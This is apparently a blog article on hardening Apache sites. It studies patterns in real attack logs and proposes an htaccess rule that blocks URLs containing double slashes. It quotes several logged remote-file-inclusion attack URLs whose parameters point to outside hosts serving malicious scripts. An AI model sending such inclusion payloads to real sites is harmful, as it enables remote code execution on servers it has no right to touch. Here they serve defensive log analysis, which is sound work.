In this series of five articles, I share insights and discoveries concerning website security and protecting against malicious attacks. In this first article of the series, I examine the process of identifying attack trends and using them to immunize against future attacks. Subsequent articles will focus on key blacklist strategies designed to protect your site transparently, effectively, and efficiently. At the conclusion of the series, the five articles will culminate in the release of the next generation 3G Blacklist.
Improving Security by Exploiting Server Attack Patterns
Crackers, spammers, scrapers, and other attackers are getting smarter and more creative with their methods. It is becoming increasingly difficult to identify elements of an attack that may be effectively manipulated to prevent further attempts. For example, attackers almost exclusively employ decentralized botnets to execute their attacks. Such decentralized networks consist of large numbers of compromised computer systems that are remotely controlled to post data, run scripts, and request resources. Each compromised computer used in an attack is associated with a unique IP, thus making it impossible to prevent future attempts by blocking one or more addresses:
# another blocked scumbag deny from 123.456.789.321
Unfortunately, identifying and blocking every IP address involved with an attack proves utterly useless because a completely different subset of computers may be used for the next attack. Unless you are blocking specific networks of known offenders, those countless “
from” entries in your htaccess file are effectively worthless — wasting resources and reducing performance. For similar reasons, identifying and blocking each different user agent involved in attack is similarily futile. Faking use-agent data is trivial and even unnecessary when utilizing localized software on compromised machines.
If blocking individual IPs and user agents is ineffective, which residual data may be used to immunize against repeat attacks? Examining your site’s access and error logs reveals a plethora of data for each request, including remote ( IP ) address, user agent, referral source, requested resource, and server response. Within these data, recognizing and exploiting server attack patterns is critical for improving site security and preventing repeat offenses. Fortunately, as previously discussed, decentralized random attacks frequently target similar resources, thereby revealing key patterns in requested URL and query string data that may be used to secure your site.
A real-world example
During a recent examination of my access and error logs, I spent the time to identify and isolate approximately 50 attempted vulnerability exploits. Among the recorded data, no recognizable or otherwise useful patterns exist within IP-address, user-agent, or referrer data subsets. To see this for yourself, check out the cultivated dataset and compare the various IP and user-agent data. Several repeat values do occur, however evidence clearly suggests the decentralized nature of the attack. Within the requested-resource data, however, several useful patterns emerge. Consider the following subset of requested URL data (Note: in the following log entries,
perishablepress.com has been replaced with
example.com to prevent 404 errors from googlebot et al):
https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//playing.php/common/db.php?commonpath=http://www.trepamontes4x4.com/digi/menu? https://example.com/press/2007/12/17/how-to-enable-php-error-logging-via-htaccess//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? https://example.com/press/wp-content/online/code//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.labcorp.co.kr/labcorp_system//skin/zero_vote/test?? https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? https://example.com/press/tag/php//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? https://example.com/press/wp-content/online/code//mcf.php?content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c??
What is the unifying element among this seemingly disparate collection of targeted URLs? Keep in mind that we are trying to evolve the blacklist strategy by identifying and exploiting common aspects of an attack, thereby maximizing our coding efforts. As you can see, there are a few common elements, such as the following two character strings:
common” (found in the first and fourth URLs)
eesmeray” (found in the last two URLs)
Beyond this, the careful observer will also notice yet another common element, one that unifies the entire collection of attack strings. Within each URL, appearing before the query string, are two forward-slash characters (
// ). Apparently, these “double slashes” are artifacts of the URL-targeting process. Certain attack scripts assume a missing “trailing slash” on target URLs. Thus, such attack strings automatically append a trailing slash onto every tested URL to avoid the following scenario:
The result of this misguided cracker assumption is that many attempted attacks involve URLs containing two adjacent forward slashes. How frequently is this behavior seen? Examine your access/error logs and see for yourself. In my experience, approximately half of all attacks target nonexistant URLs that contain the double slashes.
For example, if you investigate the entire error log referenced in this article, you will find that roughly half of the entries could have been avoided if the now-infamous double slashes had been blocked at the server level.
A real-world solution
At this point, the question becomes “is it possible and safe to deny all URL requests that include two adjacent forward slashes?” Fortunately, the answer is a resounding “yes!” Allow me to explain why this is the case:
- beyond the
http://declaration, double slashes are not present in valid/legitimate URLs
RedirectMatchdirective considers neither the protocol nor the domain (i.e., “
http://domain.tld”) of the URL when pattern matching against the given expression (e.g., “
- the double slashes frequently appear directly after legitimate URLs and yet before the query string
Therefore, using Apache’s
RedirectMatch directive, we arrive at a simple, elegant method for securing sites against a significant number of attacks. To implement this technique, either place the following code into your site’s root htaccess file, or wait for the imminent release of the 3G Blacklist, which will include the following directive:
# BLOCK DOUBLE SLASH <IfModule mod_alias.c> RedirectMatch 403 \/\/ </IfModule>
Once in place, keep an eye on your access and error logs. You should see the results immediately. ;) Since implementing this single line of code, I have seen the number of attempted attacks (as indicated by access/error log files) decrease by around half. I still find it hard to believe that such a tiny bit of code could save so much time!
Hopefully, this article will help webmasters, designers, and bloggers improve their overall site security and defend against repeat server attacks. By identifying and exploiting patterns and trends in server attack patterns, it is possible to isolate unifying elements and use them to immunize against future attempts. By focusing on the most common features of spam and cracker attacks, we can maximize our efforts and avoid the time-wasting futility of chasing individual properties of decentralized botnets.
Stay tuned for the continuation of Building the 3G Blacklist, Part 2: Improving Site Security by Preventing Malicious Query String Exploits. If you have yet to do so, I highly encourage you to subscribe to Perishable Press. As always, thank you for your generous attention.
As mentioned in the article, I have cultivated a log file demonstrating the series of attacks that lead to the development of this “double-slash” blacklisting technique. The file features approximately 50 entries, each of which includes myriad data ranging from referrer and remote identity to user agent and query string. Additionally, in the process of writing this article, the log entries were divided into various sections and commented accordingly.